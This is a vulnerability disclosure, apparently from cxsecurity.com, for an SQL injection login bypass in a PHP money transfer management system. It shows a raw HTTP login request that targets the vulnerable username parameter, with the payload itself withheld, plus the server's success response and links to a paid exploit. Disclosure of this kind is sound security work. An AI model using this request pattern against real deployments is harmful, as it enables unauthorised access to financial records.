Money Transfer Management System - MTMS- PHP 1.0 SQLi-Bypass Authentication

2025.04.24
bg nu11secur1ty (BG) bg
Risk: Medium
Local: Yes
Remote: Yes
CVE: N/A
CWE: N/A

# Titles: Money Transfer Management System - MTMS- PHP (by: oretnom23 ) v1.0 SQLi-Bypass Authentication # Author: nu11secur1ty # Date: 04/24/2025 # Vendor: https://github.com/oretnom23 # Software: https://www.sourcecodester.com/php/15015/money-transfer-management-system-send-money-businesses-php-free-source-code.html # Reference: https://portswigger.net/web-security/sql-injection ## Description: The username parameter is vulnerable for SQLi-Bypass Authentication vulnerability. The parameter is not sanitizing well, no matter that you've changed the password the attacker can get all sensitive information from this system when he attacks it online, He can login super easily WITHOUT PASSWORD - ONLY USER - bypassing, and can crash or get every sensitive information from him! STATUS: HIGH-CRITICAL Vulnerability [+]Exploit: - SQLi: ```SQLi POST /mtms/classes/Login.php?f=login HTTP/1.1 Host: pwnedhost.com Cookie: PHPSESSID=jbnk1aq9koik72ud3g4stt6ik3 Content-Length: 44 Sec-Ch-Ua-Platform: "Windows" Accept-Language: en-US,en;q=0.9 Sec-Ch-Ua: "Chromium";v="135", "Not-A.Brand";v="8" Sec-Ch-Ua-Mobile: ?0 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: https://pwnedhost.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://pwnedhost.com/mtms/admin/login.php Accept-Encoding: gzip, deflate, br Priority: u=1, i Connection: keep-alive username=_the_exploit_here_&password= ``` [+]Response: ``` HTTP/1.1 200 OK Date: Thu, 24 Apr 2025 06:48:30 GMT Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4 X-Powered-By: PHP/8.2.4 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Content-Length: 20 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 {"status":"success"} ``` # Reproduce: [href](https://www.patreon.com/posts/money-transfer-0-127342523) # Buy an exploit only: [href](https://satoshidisk.com/pay/COEb97) # Time spent: 00:15:00 -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html https://cxsecurity.com/ and https://www.exploit-db.com/ 0day Exploit DataBase https://0day.today/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty <http://nu11secur1ty.com/>


See this note in RAW Version
Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2025, cxsecurity.com

 

Back to Top